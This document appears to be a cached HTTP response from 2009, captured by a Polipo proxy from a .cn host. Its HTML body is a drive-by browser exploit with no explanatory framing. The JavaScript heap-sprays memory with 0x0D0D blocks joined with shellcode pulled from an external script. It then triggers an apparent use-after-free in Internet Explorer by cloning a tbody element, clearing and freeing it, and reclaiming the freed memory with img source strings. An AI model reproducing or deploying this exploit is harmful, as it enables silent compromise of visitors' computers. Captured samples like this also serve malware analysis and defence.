HTTP/1.1 200 OK
Content-Length: 677
ETag: "b08cc610189ac91:299"
Date: Thu, 12 Mar 2009 07:05:43 GMT
Last-Modified: Sun, 01 Mar 2009 02:47:30 GMT
Content-Type: text/html
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
X-Polipo-Location: http://kghytgv.cn:6135/cx.htm
X-Polipo-Date: Thu, 12 Mar 2009 07:13:43 GMT
X-Polipo-Access: Wed, 18 Mar 2009 08:57:59 GMT

<script src="xmybrx.js"></script>
<script language="JavaScript">

var array = new Array(); 

var ls = 0x100000-(mycx.length*2+0x01020); 

var b = unescape("%u0D0D%u0D0D"); 
while(b.length<ls) { b+=b;} 
var lh = b.substring(0,ls/2); 
delete b; 

for(i=0; i<0xD0; i++) { 
	array[i] = lh + mycx;
} 

CollectGarbage();

var s1=unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA");
var a1 = new Array();//
for(var x=0;x<500;x++) a1.push(document.createElement("img"));
o1=document.createElement("tbody"); 
o1.click; 
var o2 = o1.cloneNode();	
o1.clearAttributes(); 
o1=null; CollectGarbage(); 
for(var x=0;x<a1.length;x++) a1[x].src=s1; 
o2.click;
</script>